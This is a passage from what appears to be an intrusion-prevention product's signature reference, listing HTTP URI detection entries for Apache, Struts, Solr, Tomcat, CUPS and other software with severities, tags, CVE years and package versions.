Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Apache-Apr-Util-IPv6-URI-Parsing
Description:
Back to top

HTTP_CSU-Apache-Backslash-Directory-Traversal

About this situation: Apache backslash Directory Traversal
Context: HTTP Request URI
Severity: 10
Tags: Windows, Any Hardware, Apache, CVE2002, CVE2011, Windows not specific, Apache not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1831-5242
Vulnerability: HTTP-Apache-Backslash-Directory-Traversal
Sybase-EAServer-Directory-Traversal
Description:
Back to top

HTTP_CSU-Apache-Couchdb-Config-Command-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation CouchDB detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation CouchDB, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1025-5242
Vulnerability: Apache-Couchdb-Config-Command-Execution
Description:
Back to top

HTTP_CSU-Apache-HTTP-Server-Illegal-Character-File-Disclosure

About this situation: Attempt to obtain a restricted file via Apache vulnerability
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, Apache, CVE2003, Windows not specific, Apache not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: Apache-HTTP-Server-Illegal-Character-File-Disclosure
Description:
Back to top

HTTP_CSU-Apache-HTTP-Server-Mod-Negotiation-Filename-Handling-XSS

About this situation: An attempt to exploit a vulnerability in Apache HTTP server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2008, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Apache-HTTP-Server-Mod-Negotiation-Filename-Handling-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Apache-HTTP-Server-Mod_Proxy_FTP-Wildcard-Characters-XSS

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2008, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Apache-HTTP-Server-Mod_Proxy_FTP-Wildcard-Characters-XSS
Description:
Back to top

HTTP_CSU-Apache-HTTP-Server-Mod_Rewrite-Rewritelog-Command-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2013, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: Apache-HTTP-Server-Mod_Rewrite-Rewritelog-Command-Execution
Description:
Back to top

HTTP_CSU-Apache-HTTP-Server-Path-Traversal-CVE-2021-41773

About this situation: An attempt to exploit a vulnerability in Apache HTTP Server was detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2021, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: Apache-HTTP-Server-Path-Traversal-CVE-2021-41773
Description:
Back to top

HTTP_CSU-Apache-Httpd-Apr_FilePath_Merge-Ntlm-Relay

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Apache, CVE2024, Windows not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Vulnerability: Apache-Httpd-Apr_FilePath_Merge-Ntlm-Relay
Description:
Back to top

HTTP_CSU-Apache-Httpd-Filesmatch-Directive-Security-Restriction-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation httpd detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2017, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1130-5242
Vulnerability: Apache-Httpd-Filesmatch-Directive-Security-Restriction-Bypass
Description:
Back to top

HTTP_CSU-Apache-Httpd-Mod_Md-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation httpd detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2018, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Apache-Httpd-Mod_Md-Null-Pointer-Dereference
Description:
Back to top

HTTP_CSU-Apache-Httpd-Mod_Proxy-Ap_Proxy_Get_Worker_ex-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation httpd detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation httpd, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Vulnerability: Apache-Httpd-Mod_Proxy-Ap_Proxy_Get_Worker_ex-Null-Pointer-Dereference
Description:
Back to top

HTTP_CSU-Apache-Httpd-Mod_Proxy-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Apache mod_proxy, IBM HTTP Server for OS/400, CVE2011, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-498-5211
Vulnerability: Apache-Httpd-Mod_Proxy-Security-Bypass
Description:
Back to top

HTTP_CSU-Apache-Httpd-Mod_Proxy-Security-Bypass-2

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache mod_proxy, IBM HTTP Server for OS/400, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1087-5242
Vulnerability: Apache-Httpd-Mod_Proxy-Security-Bypass
Description:
Back to top

HTTP_CSU-Apache-Httpd-Mod_Proxy_balancer-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2012, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: Apache-Httpd-Mod_Proxy_balancer-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Apache-Jetspeed-Portal-URI-Path-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Jetspeed detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Jetspeed, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-750-5211
Vulnerability: Apache-Jetspeed-Portal-URI-Path-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Apache-Jetspeed-Rest-API-Unauthorized-User-Modification

About this situation: Apache Jetspeed Rest API Unauthorized User Modification vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Jetspeed, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-903-5242
Last changed: sgpkg-ips-903-5242
Vulnerability: Apache-Jetspeed-Rest-API-Unauthorized-User-Modification
Description:
Back to top

HTTP_CSU-Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation JSPWiki detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation JSPWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1518-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CSU-Apache-Kylin-Rest-API-Diagnosisservice-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Kylin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Kylin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1267-5242
Vulnerability: Apache-Kylin-Rest-API-Diagnosisservice-Command-Injection
Description:
Back to top

HTTP_CSU-Apache-Mod-Rewrite-Module-LDAP-Scheme-Handling-Buffer-Overflow

About this situation: Buffer overflow exploit against Apache HTTP Server
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2006, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-74-1314
Last changed: sgpkg-ips-158-2032
Vulnerability: HTTP-Apache-Mod-Rewrite-Module-LDAP-Scheme-Handling-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Apache-Ofbiz-Forgot-Password-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Apache OFBiz detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Linux, Any Hardware, Apache Software Foundation OFBiz, CVE2024, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1742-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: Apache-Ofbiz-Forgot-Password-Directory-Traversal
Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-38856
Description:
Back to top

HTTP_CSU-Apache-OpenMeetings-Nettest-Web-Service-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OpenMeetings detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache OpenMeetings, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1582-5242
Vulnerability: Apache-OpenMeetings-Nettest-Web-Service-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Apache-Potential-Probe

About this situation: Suspected vulnerability probe of an Apache httpd server
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Apache, Any Operating System not specific, Apache not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-1757-5242
Vulnerability: HTTP-Apache-Potential-Probe
Description:
Back to top

HTTP_CSU-Apache-Rave-User-Information-Disclosure

About this situation: An attempt to exploit an Apache Rave User Information Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Rave, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1378-5242
Vulnerability: Apache-Rave-User-Information-Disclosure
Description:
Back to top

HTTP_CSU-Apache-Roller-OGNL-Injection-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Apache Roller detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Roller, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-556-5211
Vulnerability: Apache-Roller-OGNL-Injection-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Apache-Server-Status-Probe

About this situation: Suspected vulnerability probe of an Apache httpd server
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Apache, Any Operating System not specific, Apache not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1169-5242
Vulnerability: HTTP-Apache-Potential-Probe
Description:
Back to top

HTTP_CSU-Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386

About this situation: An attempt to exploit a vulnerability in Apache Solr detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
Description:
Back to top

HTTP_CSU-Apache-Solr-Fake-URL-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Solr
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Apache-Solr-Fake-URL-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Apache-Solr-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Solr detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: Apache-Solr-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Apache-Solr-Replicationhandler-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Solr detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Apache-Solr-Replicationhandler-Server-Side-Request-Forgery
Description:
Back to top

HTTP_CSU-Apache-Solr-Solrresourceloader-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Solr detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Apache-Solr-Solrresourceloader-Directory-Traversal
Description:
Back to top

HTTP_CSU-Apache-Source-Asp

About this situation: Access to vulnerable script
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Apache::ASP, CVE2000, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: Apache-Source-Asp-File-Disclosure
Description:
Back to top

HTTP_CSU-Apache-SSL-Proxy-Vulnerability

About this situation: Detects attacks exploiting Proxy vulnerability in apache
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: Apache-Mod-Ssl-Log-Function-Format-String
Description:
Back to top

HTTP_CSU-Apache-Struts-2-CVE-2017-9805-Post-To-URL

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-987-5242
Last changed: sgpkg-ips-987-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts 2 detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2011, CVE2012, CVE2013, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1100-5242
Vulnerability: Apache-Struts-2-Conversionerrorinterceptor-OGNL-Script-Injection
Apache-Struts-2-Parametersinterceptor-OGNL-Command-Execution
Apache-Struts-Url-And-Anchor-Tag-Includeparams-OGNL-Command-Execution
Apache-Struts-Dynamic-Method-Invocation-Remote-Code-Execution
Apache-Struts-2-Developer-Mode-OGNL-Execution
Description:
Back to top

HTTP_CSU-Apache-Struts-Encoded-Dot-Dot-Slash-Directory-Traversal

About this situation: Detects file discloure via directory traversal against Apache Struts
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2008, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-182-2032
Last changed: sgpkg-ips-1714-5242
Vulnerability: HTTP-Apache-Struts-Directory-Traversal-File-Disclosure
Description:
Back to top

HTTP_CSU-Apache-Struts-RCE-CVE-2018-11776

About this situation: An attempt to exploit a vulnerability in Apache Struts detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1095-5242
Last changed: sgpkg-ips-1095-5242
Vulnerability: Apache-Struts-RCE-CVE-2018-11776
Description:
Back to top

HTTP_CSU-Apache-Subversion-Authzsvnreposrelativeaccessfile-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Subversion detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Vulnerability: Apache-SVN-Authzsvnreposrelativeaccessfile-Null-Pointer-Dereference
Description:
Back to top

HTTP_CSU-Apache-Tomcat-Allowlinking-Uriencoding-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Tomcat detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1010-5242
Vulnerability: Apache-Tomcat-Allowlinking-Uriencoding-Directory-Traversal
Description:
Back to top

HTTP_CSU-Apache-Tomcat-Formauthenticator-Open-Redirect

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Tomcat detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1642-5242
Last changed: sgpkg-ips-1642-5242
Vulnerability: Apache-Tomcat-Formauthenticator-Open-Redirect
Description:
Back to top

HTTP_CSU-Apache-Tomcat-HTTP-Put-Windows-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Tomcat detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1009-5242
Vulnerability: Apache-Tomcat-HTTP-Put-Windows-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Apache-Tomcat-Mod-jk.so-URI-Worker-Long-Url-Buffer-Overflow-2

About this situation: Detects buffer overflow attacks via long URLs against Apache Tomcat mod_jk.so
Context: HTTP Request URI
Severity: 10
Tags: Linux, Any Hardware, Apache Tomcat, CVE2007, Linux not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-171-2032
Last changed: sgpkg-ips-171-2032
Vulnerability: Apache-Tomcat-Mod_jk.so-URI-Worker-Long-Url-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Apache-Tomcat-Servlet-Engine-Directory-Traversal-2

About this situation: Attempt to exploit directory traversal vulnerability in Apache Tomcat detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2007, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Vulnerability: Apache-Tomcat-Servlet-Engine-Directory-Traversal
Description:
Back to top

HTTP_CSU-Apple-CUPS-Web-Interface-URL-Handling-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apple Computer Common UNIX Printing System (CUPS) detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Common UNIX Printing System, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-593-5211
Vulnerability: Apple-CUPS-Web-Interface-URL-Handling-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Apple-CUPS-Web-Interface-Url-Handling-Cross-Site-Scripting-CVE-2015-1159

About this situation: An attempt to exploit a vulnerability in Apple Computer Common UNIX Printing System (CUPS) detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apple Common UNIX Printing System, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Apple-CUPS-Web-Interface-Url-Handling-Cross-Site-Scripting-CVE-2015-1159
Description:
Back to top

HTTP_CSU-Apple-Installer-Package-Filename-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apple Installer detected
Context: HTTP Request URI
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-420-4219
Vulnerability: Apple-Mac-OS-X-Installer-Package-Filename-Format-String-Vulnerability
Description:
Back to top

HTTP_CSU-Apple-Mac-OSX-DS-Store-Directory-Information-Disclosure

About this situation: HTTP Request for .DS_Store attribute file detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-532-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: Apple-Mac-OSX-DS-Store-Directory-Information-Disclosure
Description:
Back to top

HTTP_CSU-Arcadyan-Firmware-Path-Traversal-CVE-2021-20090

About this situation: An attempt to exploit a vulnerability in Arcadyan firmware detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Arcadyan, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1386-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Arcadyan-Firmware-Path-Traversal-CVE-2021-20090
Description:
Back to top

HTTP_CSU-ARS-VBS-Loader-C2-Traffic

About this situation: ARS VBS Loader C2 traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Vulnerability: ARS-VBS-Loader-C2-Traffic
Description:
Back to top

HTTP_CSU-Artica-Proxy-Fw.login.php-Apikey-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Artica Tech Artica Proxy detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Artica Tech Artica Proxy, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1294-5242
Vulnerability: Artica-Proxy-Fw.login.php-Apikey-SQL-Injection
Description:
Back to top

HTTP_CSU-Artica-Proxy-Images.listener.php-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in Artica Tech Artica Proxy detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Artica Tech Artica Proxy, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
